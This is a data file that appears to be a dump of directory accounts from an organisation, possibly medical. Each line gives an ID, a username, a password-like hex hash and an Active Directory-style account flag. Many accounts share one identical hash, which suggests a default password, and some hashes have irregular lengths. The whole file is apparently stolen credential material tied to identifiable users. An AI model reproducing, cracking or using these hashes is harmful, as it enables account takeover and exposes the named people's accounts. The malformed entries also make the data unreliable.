1204 draugdahl 71b43a8306d1bb60e84a0bc2400a5a21 512
1225 drpearson 71b43a8306d1bb60e84a0bc2400a5a21 512
1229 drschmidt 71b43a8306d1bb60e84a0bc2400a5a21 512
1231 drtraiser 71b43a8306d1bb60e84a0bc2400a5a21 512
1239 mgblaplante 71b43a8306d1bb60e84a0bc2400a5a21 512
1244 drbusian 71b43a8306d1bb60e84a0bc2400a5a21 512
1247 drhenry 71b43a8306d1bb60e84a0bc2400a5a21 512
1249 drmcfarlane 71b43a8306d1bb60e84a0bc2400a5a21 512
1252 drstephens 71b43a8306d1bb60e84a0bc2400a5a21 512
1685 jastokfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1689 jdricksn 71b43a8306d1bb60e84a0bc2400a5a21 512
1680 drwernecke f648163703e6c08e66e778c9fcf1c695 512
1256 dmandemu 71b43a8306d1bb60e84a0bc2400a5a21 512
1699 tmtomhmu 71b43a8306d1bb60e84a0bc2400a5a21 512
1701 r_rollhs 71b43a8306d1bb60e84a0bc2400a5a21 512
1716 jjgreged 71b43a8306d1bb60e84a0bc2400a5a21 512
1717 rliverfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1258 V_vanwsn 71b43a8306d1bb60e84a0bc2400a5a21 512
1262 amandamarthaler 71b43a8306d1bb60e84a0bc2400a5a21 512
1263 amysievert 71b43a8306d1bb60e84a0bc2400a5a21 512
1266 annetteellingson 71b43a8306d1bb60e84a0bc2400a5a21 512
1274 debschneider 71b43a8306d1bb60e84a0bc2400a5a21 512
1279 hollythompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1281 jerimitchell 71b43a8306d1bb60e84a0bc2400a5a21 512
1283 jillbrethorst 71b43a8306d1bb60e84a0bc2400a5a21 512
1288 kathithompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1289 katrinajohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
1294 margaretmoore 71b43a8306d1bb60e84a0bc2400a5a21 512
1295 marilynewan 71b43a8306d1bb60e84a0bc2400a5a21 512
1296 maryfredrickson 71b43a8306d1bb60e84a0bc2400a5a21 512
1306 sherrimaanum 71b43a8306d1bb60e84a0bc2400a5a21 512
1307 sonyakelly 71b43a8306d1bb60e84a0bc2400a5a21 512
1314 vickirode e813a6c841263e9cf4127f2eb34f7cda 512
1318 glstabsn 71b43a8306d1bb60e84a0bc2400a5a21 512
1319 lanerrfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1320 sjnelson 71b43a8306d1bb60e84a0bc2400a5a21 512
1248 drkobriger 81b11bc140d8511fea3f1a627bc5069d 512
1112 calibrate 7e4026687ad6be0a6d736f1fabc8bc16 66048
1718 njolson 45a3cb98d159490c48e9add320b2754a 512
1260 betseypetersen 5af6ca259ee8bf3f44ec14900435a0a2 512
1195 cgtysver fa7d5249b9eaee7735cd74b7621d3c7f 512
1729 c_grafrc 71b43a8306d1bb60e84a0bc2400a5a21 512
1730 njjohnson e813a6c841263e9cf4127f2eb34f7cda 512
1735 tadebrito 71b43a8306d1bb60e84a0bc2400a5a21 512
1737 jwachlarowicz 71b43a8306d1bb60e84a0bc2400a5a21 512
1739 drkimoffice 71b43a8306d1bb60e84a0bc2400a5a21 512
1652 plwiczek 718cbf401001bbfd8fedda9dc078af6 512
1713 jmlien d76c4dbb99f9fe336e7634cfc0fd5d7b 512
1723 jjongeward 656e2f0fb9f108bb7008d5e6e57ac973 512
1329 dnheskin 71b43a8306d1bb60e84a0bc2400a5a21 512
1733 ckmaucrc 11c256333da14053ffb516f84c7876c4 512
1726 j_blonrc 2bd91c2112b3895a356dc850d6ed1acd 512
1700 ndhellhs ba7cabf4467a8145d97d787dd386d888 512
1224 drona 006c00f6d6e35bdc75c69989060399c2 512
1741 drsell c7bad7d1cc2f3c69adea5ccb429234ad 512
1719 swancma 82cd2c655e2f5c0d096181faa5d9c54e 512
1172 nyhukjmu 789cc4b71ce5c2391956ac1df34ddd93 512
1673 edmgr 4b6d381d8bf53c5be1620293ceccacf3 512
1709 mahansed 9d79f63d8560fc299e5daeb07f0bccdf 512
1191 kjswanson 71b43a8306d1bb60e84a0bc2400a5a21 514
1760 h_billor 71b43a8306d1bb60e84a0bc2400a5a21 512
1728 mabakker 3fed67f37553c237ba0e3506ab7722d1 512
1334 patriciatell 71b43a8306d1bb60e84a0bc2400a5a21 514
1683 sdkroged 2bd09797bbcd1cb0c56b800b99b374fe8 512
1326 drovervold 71b43a8306d1bb60e84a0bc2400a5a21 512
1336 aefrank 71b43a8306d1bb60e84a0bc2400a5a21 512
1338 neflinck 71b43a8306d1bb60e84a0bc2400a5a21 512
1341 kjthompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1342 hmanderson 71b43a8306d1bb60e84a0bc2400a5a21 512
1345 tanyaconroy 71b43a8306d1bb60e84a0bc2400a5a21 512
1347 debthom 71b43a8306d1bb60e84a0bc2400a5a21 512
1768 kimborgus 71b43a8306d1bb60e84a0bc2400a5a21 514
1724 drludwig 6db862a3e5993ea3245de09f7c560d5f 512
1714 uhlialed c1d60fccbdc09924681b9cf859ad1eeb 512
1740 drwoolner c36e58e7931f4dfbf68dd4e583ec39b1 512
1770 seedwafp 71b43a8306d1bb60e84a0bc2400a5a21 512
1771 banelson 71b43a8306d1bb60e84a0bc2400a5a21 512
1772 mwbabcock 71b43a8306d1bb60e84a0bc2400a5a21 512
1267 barbarabecker 014631dff7c5641f56b1264ce44b9e86 512
1677 n_saxed 5f998160d5a5c5771cbba046f9ecb191 512
1357 bjwasved 71b43a8306d1bb60e84a0bc2400a5a21 512
1276 dianeskistad b0d18851aaddc665883a0c2fc3eb1f95 512
1346 theresakallstrom 71b43a8306d1bb60e84a0bc2400a5a21 512
1653 rlswanson f08eaf4b67a44f9db354e7c0b6fc5437 512
1687 lmlundfp 85dd1a8770bd756de08b696064775da3 512
1192 lcundssu 71b43a8306d1bb60e84a0bc2400a5a21 512
1766 drvanderhagen 555f7cd2e083212e14b921c6d6eafff1 512
1360 petersm 612dcf80df63db5bd313d16e235e7e37 512
1774 holewam 3f1e1f48a52790b07fc8f7f78fd1896d 512
1674 ksgilbed 31d05994bf7883f4d452dd8a9f1f54 512
1780 kimkugler 71b43a8306d1bb60e84a0bc2400a5a21 512
1781 megangriep 71b43a8306d1bb60e84a0bc2400a5a21 512
1779 nelssjcs b7496bd41da213cb86be83810f061dde 512
1366 dremokpae 71b43a8306d1bb60e84a0bc2400a5a21 512
1353 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512
1328 dsniklrc 71b43a8306d1bb60e84a0bc2400a5a21 514
1210 drhaeberlin 71b43a8306d1bb60e84a0bc2400a5a21 514
1361 howelam 71b43a8306d1bb60e84a0bc2400a5a21 514
1637 sbklein 45bd8db3b86d6a8b84fe7207cf2947ed 514
1184 ajmarfsu 860e03409ab78f44104caedfdc8828cf 512
1268 beverlyswanson 413995a825f8b6a0e5a834b0bdb47e83 512
1786 todd.test 782d1e5173aa367fe33e7e053beb33056 66080
1200 jlolson c3fb49594fecd04eb9f48f7ba427bda8 514
1712 dmwoldhs 57f3f7aa8bc515d493f9be1e451ad62a 512
1234 drwambach 0c4913e8c53fe4b010dfa6912537259d 512
1790 drakahara 48a83263e1c057daea02a7cb8e176eb0 512
1214 drkowitz 0172551e7970180b30fc40c267022f90 512
1670 aenorling 1f65c8fe7ee03766746f7bf6a2660326 512
1752 harsjlfp 59d6671166815ebb331ec92c8d0d6fd0 512
1676 l_roched cf42d09286c840daa07184cfb88c2b0d 512
1782 drbrady b22ac831efdbed50fd58d999b85901a5 512
1169 jeskilcc 71b43a8306d1bb60e84a0bc2400a5a21 512
1694 c_grotmu 83aa2cee51e1820b81117b7b24ea1277 512
1794 srwolemn 71b43a8306d1bb60e84a0bc2400a5a21 512
1213 drjoo 3a8413d12bee65e418af57e98a50ce401 512
1331 kmcarlson 71b43a8306d1bb60e84a0bc2400a5a21 512
1343 blfinksu 71b43a8306d1bb60e84a0bc2400a5a21 512
1645 maseivxr 0f1441e83d371915a7d51d151eae4e0f 512
1380 drm 71b43a8306d1bb60e84a0bc2400a5a21 512
1704 j_hallmu e79ff7c7b9a43a4f8f90373a22473330 512
1384 kmkoep 71b43a8306d1bb60e84a0bc2400a5a21 512
1385 seanmcdonald 9b908fe25801a0c4b58fbe51356c5511 512
1793 drjamison 42286d96f65b34de624c721fc0811e 512
1387 drdorr 71b43a8306d1bb60e84a0bc2400a5a21 512
1804 drnammour 71b43a8306d1bb60e84a0bc2400a5a21 512
1803 jeggers 71b43a8306d1bb60e84a0bc2400a5a21 512
1332 kmpaulsu 71b43a8306d1bb60e84a0bc2400a5a21 512
1675 pmahlsed eae0eb74a1fb7f1650235564fe53fd87 514
1389 suhlig 71b43a8306d1bb60e84a0bc2400a5a21 512
1806 lngervais 71b43a8306d1bb60e84a0bc2400a5a21 512
1278 emilyanderson 93c6701c7cbed0e3023f9d8d4040d9c8 512
1821 cjhagel 71b43a8306d1bb60e84a0bc2400a5a21 512
1822 jnericfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1823 vwayres 71b43a8306d1bb60e84a0bc2400a5a21 512
1178 godtkesu 71b43a8306d1bb60e84a0bc2400a5a21 514
1238 pkutter f2dd7e09b601b1150a125fdf837ecab1 512
1814 lmgreesu 266b440f052f39f8b5085d46cfa8664b 512
1791 drpierce 85fea9b4d7122aa17bdc9eac23d67cad 512
1333 cjshockley 71b43a8306d1bb60e84a0bc2400a5a21 514
1393 drspeltz b11f4956811fd50e573fa91c3e06e7ff 512
1778 retz 71b43a8306d1bb60e84a0bc2400a5a21 512
1179 jbclassu 71b43a8306d1bb60e84a0bc2400a5a21 512
1831 klugert ba70d3be0d0794f0b6a4158e6ef5419b 512
1830 eanderson 157aaf2b5e766f4e3f41e9f65e4f1f16 512
1374 cgerhardson bf6bb7d7ae3ccdd414b9503133f2c9 512
1406 jhkhan 71b43a8306d1bb60e84a0bc2400a5a21 512
1245 mbraaten 71b43a8306d1bb60e84a0bc2400a5a21 512
1209 dretzell 71b43a8306d1bb60e84a0bc2400a5a21 512
1410 droppenheim 69aec82d520250d0ef7dd129b1b59f79 512
1372 kmisemer 66e9ad66103e96be56bf6595c97e847e 512
1407 april.hoaby 3279750c1b635b210f49a078f65ba504 512
1789 jbrown af16e20cecbde59670d59cc6bcf59895 512
1408 mhewson 4a15b1e5cc804fc563e92fb1cc2736ee 512
1186 ecklpasu 71b43a8306d1bb60e84a0bc2400a5a21 512
1400 easalata 71b43a8306d1bb60e84a0bc2400a5a21 512
1257 steramsu c6886c68ea545b39393356e21207c9ca91 512
1795 heidi 638579b8a17d0127b57bcedc6976eb76 512
1840 debstone 71b43a8306d1bb60e84a0bc2400a5a21 512
1841 kerridolan 71b43a8306d1bb60e84a0bc2400a5a21 512
1175 andekmsu 76bfcb4fa2358c890592c5d4a956aba0 514
1818 n_shorfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1843 drhswenson d1114a3e69a780a03f502ad29efd14ea 512
1753 kaholec a1467e26a9c0b09f6a828ddb09ca0695 512
1412 jkasowski 0123bd3c30a8631aabff7117b1231f35 512
1207 drcrintea 1d23b0251eff76781cb8221ab962a767 512
1663 sjseabor eda257f668850270be069bc300b44f08 512
1181 dcgolosu 0e2cf0faf8915da9729e54cb96acb1186 512
1832 eheath 27ba1a95ac5c9719fd458ee43456d29a 512
1801 lmoore bc26ef0fa677cec9695257fcaabac38d 512
1824 tlbarrmu 71b43a8306d1bb60e84a0bc2400a5a21 512
1330 cjkurtxr d78ed82380a53851bcbdfb612c6b8b8a 512
1409 cweber 4d64ef67135fecc5bb20918df8b38ae 512
1826 vaross 2cb05598cb564216b64bc7132e5a3c17 514
1813 zielclpt 71b43a8306d1bb60e84a0bc2400a5a21 512
1269 caroljohnson 8b811002cbb05013271c130234f109ce 512
1388 bmayfield 72f5710f8901495212b162c9f4c0688b 512
1732 rcmgr 6d0b7222e3b4bc3075bbf8d242de10f0 512
1692 boseklmu 71b43a8306d1bb60e84a0bc2400a5a21 514
1746 ljrognbi 90ff62734f34b638a23a90096ebd83f2 512
1848 rthomas 71b43a8306d1bb60e84a0bc2400a5a21 512
1419 nygaard 74138648db6c91f3b109e33af2b67490 512
1849 daniellewest 71b43a8306d1bb60e84a0bc2400a5a21 512
1335 knjohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
1350 glendahoff 41a0cf95ef2cd698846d4206e2150aea 512
1302 brennasu 71b43a8306d1bb60e84a0bc2400a5a21 512
1193 kjehlert 71b43a8306d1bb60e84a0bc2400a5a21 514
1825 krstenstrum 71b43a8306d1bb60e84a0bc2400a5a21 514
1634 jejohnson 71536fe0fcc8422e94815f0cc437f8ca 514
1857 drpahk 71b43a8306d1bb60e84a0bc2400a5a21 512
1859 drhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512
1860 drmhoffman 71b43a8306d1bb60e84a0bc2400a5a21 512
1863 cconduah 71b43a8306d1bb60e84a0bc2400a5a21 512
1842 speterson 259ccc44e8d8285d03308e1d7a3950f4 512
1189 gjryansu d973bcbafd3c71be5a1d5770b0cc108b 514
1183 mrisaac 71b43a8306d1bb60e84a0bc2400a5a21 514
1695 imlundmu 71b43a8306d1bb60e84a0bc2400a5a21 514
1190 dmstorsu e9a3bb1f8098d80e1325a6450acd498d 512
1845 mhasbargen 1090fe654dada75e3b7ccf74536492ed 512
1182 slhanssu b333890541d008501cf2619854d23ab8 512
1864 ttomlinson 7a21990fcd3d759941e45c490f143d5f 512
1376 drmcguire 5e8d031f68497f6e5021a790bf98e88e 512
1632 adhoepxr 69e463660e9f2abd43f7b54c2bd1f903 514
1401 drlonginow 16d99248b55a4a6545926a6f69d0f347 512
1427 kflemming 4a57c663416c16cc53f6625fda9713e9 512
1433 drgreatens 71b43a8306d1bb60e84a0bc2400a5a21 512
1221 jmitchell 71b43a8306d1bb60e84a0bc2400a5a21 512
1220 drmathison 36f8dee2ff0c6e543fd59c047f67c8d2 512
1201 dramundson 2a6ec2a808ddbb99cadf6d39e7ba10c6 512
1308 suehalvorson bfc33e7d7b1e1280e400e373314d3712 512
1720 thukkelberg ff60fbd62ec55db9065eecccfe8524db 512
1355 sarahnjos 8f59bbde2fd4f043e4c594fb949244c7 512
1394 aprilklimp 37b6aa4b892b68833f76a686647aeb93 512
1423 ashleylee 71b43a8306d1bb60e84a0bc2400a5a21 512
1851 tlarson 88867e83b76ac69ceff784f925c357bf 512
1437 drkahn fe8d33fc9cc21bd07b00febad40b9975 512
1386 edxray 71b43a8306d1bb60e84a0bc2400a5a21 66080
1344 anthonyaukes 97c7950753f28e3a0f3a5e1178e56a7b 512
1426 dneumann af97d4341d4e18cc86e7c5076910e691 512
1846 cldrevcc c66291f650232a5bf895a6729a354f0b 66080
1440 drengel 8f7c50ac5a16ea232e68219ebd4a2765 512
1873 mertesatxr 507388d7f5c9518cd213ba4d399dd534 512
1444 drsparacino 1bd1934e3efff393f5c41ca4defebfc3 512
1432 dnbeddow 961f4bdcf7eb72d71189c77c13f0b012 512
1176 surgmgr 8702ce315ef73fc3ece784001eb9928c 512
1391 drlee 1164e4a62a58f4d9f9f12f49c8841ff7 512
1218 drlocsin ddeb34a0b9aea78e864b28b6eb4735fe 512
1678 plschmmu c5f0862b2291f4f4e8082476375e8750 512
1852 tvogel 3acb51681be036c664ffd76c1d3bf0c9 512
1422 rfnorgren b88444c9d650771957bb82fcf7bc89d2 512
1858 drhegarty 71b43a8306d1bb60e84a0bc2400a5a21 512
1425 kjoleary 40132a60cd6f22212c8a527074a0a69c 512
1876 teraoye 84440338f26bf725be78c015f7d62c88 512
1838 abourassa 5d82f96da844c0bc97f6370935076591 512
1403 msshulka b9f917853e3dbf6e6831ecce60725930 512
1622 jmberg 8d1e3c6c096ed034d091bab932595813 512
1435 kperlinger 71b43a8306d1bb60e84a0bc2400a5a21 512
1708 aegrosfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1868 ceverding 7bdf56b0c8cc9bb83518f19e7a68448e 512
1669 clnelssu 1106714dfdf3328364bd1dff5b8c6fb3 512
1228 drsanderson 5c385f430d1f6f29116929882f3ac87c 66048
1418 vogt 027327890c652b43c998a5f79f63e6f9 512
1458 aolson ab6a501de2b1f760f4de0134e97b42aa 512
1883 afaulck 71b43a8306d1bb60e84a0bc2400a5a21 512
1438 billcarr 2d786d35aa24f295a4c16cc376823c20 512
1163 bklarscc 5a40ed8b78cf6ffd60359431b0bf16a0 512
1273 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 66048
1327 kimgullickson a26a70472ac72321c39702424876eb9 512
1417 tommklsn fe09f58bc0b02f235ef16607f930a733 512
1457 msimon ca94efa04ff9cd46bce17ab37c7921a3 512
1853 bfischer 84bd2e8898162d7ab24b6de777affcb9 512
1850 ehaanen fb3a22f143f41255b89bd38c7ba07b86 512
1462 akconklin 89268eb0de4473918033f6b1fc68411f 66080
1261 connieschmidt 65821c4bc2d72044ce0d3f0fa2501916 512
1890 hoekljst 2a1bcb1c0b084375aeb67da26184e521 66080
1891 stantdst 5e169f4be14574721b835902689f9d50 66080
1375 drweems fc45ba277cbf3ce7a388e7100d0b7305 512
1373 grouw e7293202fd61f34b61a0b4baa02fe6fd 66080
1742 mjbjerbi 82bb2b0b540987253accfb71d1f62692 512
1455 tbachmeier 983ff0e9ad101c900da0c5bc733d5e75 512
1856 drbeehler acb98fd0478427cd18949050c5e87b47 512
1456 ljohannes a0003484e0d07e930556770c165cec6c 512
1404 eghaglind aea6119a95655f1cd8521a7a0a4b7fe0 512
1776 jdjensen 59e4e057226b31a183e383abaea7c6d8 512
1468 marshallklein beacd80369761138f6bb0aab8fc6210e 512
1474 drhamilton 71b43a8306d1bb60e84a0bc2400a5a21 512
1881 drhossain dba25b00fc0118977cef8471aa9c82d3 512
1211 drhendel f1d8e19769e696ca0b78eaab38e2255d 512
1395 drschroeder d9d8d32b8137cebc5e457103422ccea6 512
1469 angelbarnett 727112bca3218bd419fe1cce82de62a4 512
1900 cborneman c88ea1a1c1e7d82b29fe4377d18bcd5 512
1479 pehaberer 596b4baf59fca2aa4ed4f573be026fa2 512
1452 ebeauchamp 0502e7a5bcc435cb35693cf38a4fee8f 512
1478 slschutt b7e6fe1aa6d609cb1fa8aac5dcdf3acc 512
1897 orourke67 bc6e72869afdc91a67bc43e10f7094dd 66080
1908 mhockett 930780c4c40cde7420cd6d4a305ee5dc 512
1185 lmmillsu 8ed2c1b2953497e077f462f7ab4084e6 512
1251 krouw e7293202fd61f34b61a0b4baa02fe6fd 66048
1769 jmcarrsu 13509376bb407cc458585951708f27d3 512
1750 wkandebi 7bdc68efb1f39079aadd98b0304e2c27 512
1914 danelson edb0f053f8d7bd5295585d63f208f4ef 512
1351 angelabradsteen b0d18851aaddc665883a0c2fc3eb1f95 512
1486 draphrem 71b43a8306d1bb60e84a0bc2400a5a21 512
1861 cmitzel 70a75fc03a0a6727463de3fe2b3c56ff 512
1918 drsiruno 71b43a8306d1bb60e84a0bc2400a5a21 512
1304 pattell 36c71052cc9f3df09b42f66f537ce603 66048
1485 kolsen 05acb3279db9544eba15593253698ed2 512
1792 gkaplan 8d1a7f3e785301eb112b1c789f56c3a7 512
1924 smcgaughey 71b43a8306d1bb60e84a0bc2400a5a21 512
1800 bmremund 30d9347d957dffe3c1aa15ab36f6eb12 512
1164 s_martcc e98664c8af176f206d9c9a34b98b1e6c 512
1488 sbuhr 1ca6d0d3c253161bb3e45ddb1219709b 512
1913 ksherbert cfa9e1825e538868e223ce860b2c0909 512
1492 lafladeland d3f8d051fee5fab0dcfda3645ad326b7 512
1892 mwalker 93bd4c9e8882bea66b1fce8c8f58e10b 512
1460 btrontvet 95a607aba41d7dc1f32ffdbc5c122191 512
1684 g_krophs c19bb385844e62aeb63d1cab15ce2bf0 512
1442 jljerger 71b43a8306d1bb60e84a0bc2400a5a21 512
1493 cdsilas 2d2d675a0940926815c12c5c76cd5643 66080
1664 maswenor 3ae2748c03bf865aca895ee900e382c8 512
1496 dncreager 9e0f6c8bd02484863153490417381184 512
1915 kanelson 35dab29d6dae351fff051348c4bce1ed 512
1436 ktrue 058405257249b0c11ec365f8a6370982 512
1499 ahqarni 31963a3237190431525995eac7c19763 66080
1871 drjaiyebo f8f0483906c24c4068df7a3589d10da9 512
1933 gwong 628f45205d05822f848f8ea4683035f1 66080
1802 drmckee 7a8918a1fba8966061eff9738cb49e03 512
1903 ajboock 12daecf4f46efdcd3d1dcb66be685211 66080
1501 kjschonhardt 9e0b975a698164cc445b6590b478d9a8 66080
1113 colorcal ff5bde13f83d41f71ad00d7746bc74c3 66048
1132 calcxtra f8d047478c9fbb7c5fd6172f7e7148c4 66048
1503 bas 048d01202d68f356e0f7c22e12f45179 512
1337 tjhein 71b43a8306d1bb60e84a0bc2400a5a21 512
1157 a_attecc a5c622cd84f1af87c6bc9e34f348e553 512
1902 bjwalker 44745e179dc7e96cf050eca9012c6c80 66080
1819 jhmathew 71b43a8306d1bb60e84a0bc2400a5a21 512
1904 babatunde 71b43a8306d1bb60e84a0bc2400a5a21 66080
1398 juakbar ac4358090ce0ec69de96941b9159effe 512
1940 alexwong001 71b43a8306d1bb60e84a0bc2400a5a21 512
1930 afclark abaa74ccce04f1aef62f0034b526d76d 512
1405 eghide b7297b0c9a30de3c0cdc87b5d3f688a7 512
1504 roxanneh 1ecba2e0469152720045def76416c8e6 66080
1495 rachelvoll a3397279e951697a4d9746231c9baf97 512
1937 lklevberg 6af5c89fabf8460a0281e7045c05d95c 512
1944 abeachy 9eb9ce5359d0d219636287eea5715766 66080
1369 drjibben d2bb7bae3a812554e6560a80bf8c0d7d 512
1783 drwhitley 6df025ce8b176733799affc44a20a202 512
1743 pkelleob 6b0b3bccf6939dabfd45089122d67bc6 512
1916 ahasling 346e634f32780e32afc8e0af7b50b882 512
1512 ftlasala 089baa6e44b9f73e9dc07a440c531c96 512
1177 djmoensu 6cfc0d4e4a46bc30cd9ab35d709058af 512
1931 mjansen c5e7e74db335524b2231d823efbeeef2 512
1949 tdebrito 71b43a8306d1bb60e84a0bc2400a5a21 512
1950 fkarsnia 71b43a8306d1bb60e84a0bc2400a5a21 512
1951 dwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1958 emedini 9674fbff3cfaaf66f4d997c889a8441a9 66080
1948 jzosel 71b43a8306d1bb60e84a0bc2400a5a21 512
1941 jsmoza 333dacdf4114b5c91dac43802a36fac9 66080
1198 gnthorp d147b5251d854e35c0f453690eb6f92c 512
1960 maakinyemi fab06fb7e4efb6a185c40f5e84eeccbc 66080
1963 mnhasnain f0f75ba30b39a4f952d09c0887e9f08a 66080
1938 bwaite 2f3d525c6bd8e700a68f44ba6460eb4e 512
1947 jstageberg a686c0c3a2580fcd62c1f5c311293ad4 66080
1516 anmorimoto 984b3943b1222418e0b227338c1702e3 512
1662 kkschabi 8fc0da975463b786cb63a655b7c7ba16 512
1517 ctmn00 9e9b58c2ac713d2ff083ae568bf40d6c 66080
1968 dsstclair 55dc4b979fed2985f9180d1ba427c817 66080
1489 parkin e1266a7e4dcf5e7064c76047a561c7e0 512
1368 drbrown a490b356a1f039bc5d02b07a51eb7caa 512
1971 jak c59508253f1ba8a772ea7b39cabcf7dd 66080
1972 jmehlert 777a4677299f8631c379d2ac18ce4830 66080
1974 hjschwartz aa2ec5b61be663b1ba420069b8b7d644 66080
1976 sllang 5821f9c48a246bac75e67390c51d7221 66080
1121 NWKS1$ cdac73fa5c46121e947253723c207d180 4096
1122 NWKS2$ 380dc1a1758e385f05b1757caf83e053 4096
1970 hottenbacher e957cf961db72e8b18461f42b32b8307 512
1120 NWKS0$ 7548ee60d9258efe0b68c20326289b4c 4096
1208 dreisinger 26c5286aad4cc5a67d6c1b498ba66878 512
1339 kaanderson 4b1dd37505ef1dae700f315e3971c75a 512
1298 marylouolson 22958710c569d1fa791f43aba4d4e9ea 512
1977 slmcfarren c42527f7be2aff1c302f881d8174a910 66080
1982 drdussault 71b43a8306d1bb60e84a0bc2400a5a21 512
1526 tmnyarandi 71b43a8306d1bb60e84a0bc2400a5a21 512
1525 grweischedel 4438bcb26b836b0339de5a6f2e66ffd0 66080
1981 oomokhodion 34edf9d3e7c66c79ccbc6225730a81d0 66080
1665 k_jordor f6212a5ae87201fe42f9d891d322cab9 512
1451 mjbutcher fcfcec23f19252d7417693e9819d8a37 512
1528 jjrigby 6ace8f289143d7bb6e5f12aadf93676c 66080
1482 lvogt 8626c1417d2543e499a70055697de1cc 512
1899 bhuotari 91f0894b363984686d7f3f32a681fe07 512
1487 bhydukovich 440921ebded7e97a4b91624abfa12058 512
1531 lavierra 315518d92657659650692e8423d3bdb5 66080
1763 d_debror 4ba24a6ef06cc00b505db9948ff695e4 512
1522 remartin 5a754961d0cd7e31f078484ff86d673b 512
1509 awells a4043550c328b3ba9832e6f755fabd24 66080
1533 dsunstrom ef270a89b56d96ef597a8c29f306b2b9 512
1481 jnistler 602a005eddfd365e04e4db27038f6c25 66048
1537 tdozak 02a7690cbb5ba35f67703ff8ff0251be 66080
1896 fmitzel 0a987196697088eefbbd958fc5bef859 512
1480 ahopkins a54ed711f34b55cded8fb5b64ead0b4d 512
1920 tjlind 73cd1d8f36c225301f1395a68644e91b 66080
1747 mlwicker 75b21858169704679e44b7de9485381e 512
1311 susanwoessner 11e81c29d73b8b739d48574bf0aca075 512
1994 smzak b7cfd41fe075a15963664b2459faa455 66080
1993 jmjohnson 530a7f8e06360c77afb7b16cfeca5584 66080
1992 ahaseeb 221ddc7e89d6ef0a69bbfa241379808a 66080
1991 amguyot 0fffd31fca8b05a4beaab0efc2bdbb42 66080
1990 jmgrudem f477b0398e548a8b526eee322df6c6fd 66080
1989 bjdavis 750c52d81089f4d5d662e82425fa7890 66080
1988 saung 5567e9bf2f46d7951f2a9660c0b48a77 66080
1956 toberg 74dc5c8262a0a22130c6aee81dca267d 512
1463 mebruininga 12050de9174a28b116fd22989bde2b10 512
1969 seharte 73a5ab74fb4af9b2562c7e0ccaf24e04 66080
1962 evavo012 c7105347e9a12d44934ed8f1b86a963c 512
1688 basillerud 85d9373449b9dd9457b3ba5bad1e18b8 512
1995 rpmontenegro 91214c29730b425f9254efdcb2e98894 66080
1996 jmmayland 66b3bfc3e9ccf7bfa5908978985b1a8b 66080
1998 skramsted 54dba8a6ef6f4180785f97a926fdb929 66080
1999 tjmohs 8e1140495086fcd954b5dfa1682d8853 512
1540 drfreeman 38c7a4d796a3bc428467097c66a7824e 512
1490 ncarlson 13d20ae7b8d1edd2a5cc2a4850dec98f 512
1954 relder 23eb25e4307a4c774c553792b29f8b 512
1518 dstclair c405a94abdb3e08736a8250e609691b5 66080
1542 djharms 4646a25232b9877c8b4cede7a79054bd 66080
1411 drellison c3b00a190a99d9f3b4e415d11491a9a2 66048
1543 pswasemiller 69246f6d972a33a4d250819f1c4c4862 66080
1547 ajstasko f3973a2a5b3cc520f11d6d5377c90887 66080
1539 adweichelt 33c88da77d69a77464c22a01fd52cd23 512
1671 k_demmed 31e8cefef1084db5c465273ea21e2b89 512
1498 jlbaldwin 8afae19cb75a9938e93e0d64185cb1c1 66080
1497 jpull 2003a86bc4317ae69c3a94df2e34271b 512
1532 arpicker 1bde10801d22449dcffb76188c626bb6 512
1473 drehler be64f8fc4124dd98cde17a19cb48acce 512
2003 tthuyn 74f754c71bc591379ba8d9e2450ae76c 512
1467 ratinsay 8a6d1d02b5f1ae79d48adc0df621f699 66080
1309 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048
2005 jrglyn 5d75661d8a53ce0417d1b6749673b16c 66080
1877 kpederson 051e63a2e0111187dfc88bc27a3bebde 512
1272 connielokhorst 431b4387576ef6314152a56f3e9e89c9 512
1736 jlindgren 0b048129c6801a30012c877dfa365985 512
1927 hrabbasi 522dc460c454db1afb366ea21bb28249 66080
1557 brhils 9c8ef96d93ff6e98dafd1dda813f015f 66080
1558 gzike 71b43a8306d1bb60e84a0bc2400a5a21 512
1711 njrundmu 3962a1c5095221bd197b54359b1eea4f 512
1561 snkent 8e4f2b090e863e4a4ab746266f395f97 66080
1562 nikreit 61bf357d002e67b6a4368816b3070056 66080
1788 dreelkema 71b43a8306d1bb60e84a0bc2400a5a21 66048
1563 mvseverson e8b5663e5c7d55253644c62d078a01e9 66080
1194 ejmoir 5add8cc48ec47eb612ed4c225935726b 512
1556 smturner 493e7347661f5df50e12d38cf45a7a11 66080
1566 bbbarnstuble 9077ca9df2f813557f61436eddbd1617 66080
1983 cdlureen 36192c3f8a11b1cc743d45d30c12b039 66080
1303 phokanson 71b43a8306d1bb60e84a0bc2400a5a21 512
1397 ijchitu d53fa7b4a7afa23d6959e9a162f594bd 512
1421 drknutson 71b43a8306d1bb60e84a0bc2400a5a21 512
2014 sbatra 40fc2f1989e9062550bf0aed5c737947 66080
1640 cml 1bc33e42cb19a792844b7fb6dd04fe9d 512
1310 susanschlueter f3e6b2997d0aa15c50e8dd0ee057882 512
1470 charlie44 53da6be61082ec74b099dceeb80cd75c 512
1898 lroehl ed0b817db13e1848e1b4b5881ba27e05 512
1564 seknutson e768dfefaf663c7662405337f32557df 512
2012 mcbressler 15701ec0d0df81b920df1285e038926a 66080
2019 abjolley 72551678e0cb74c8157833428afbfd87 66080
2022 inansine c989196e3f82c855bf256c926344231b 66080
1170 emlodicc e25144ddc66a1e65d6025c687a363c80 512
1570 grhyland f7f2f14d1571ad848b5caae0afe576aa 512
1986 alako 97097d2962cb4b3dd0e0ce12aff3ad 66048
1952 adool 2ddf823d166e7d8769a76a9b9963e980 512
2006 bboom 56ff6b4a94bb106bc53ed861131a084f 66048
1953 pappelget c1287233b1dae2ae1cfb93f65003358d 512
1356 beckyhensch 6e5e3967d92ddbde06e26298c0648194 512
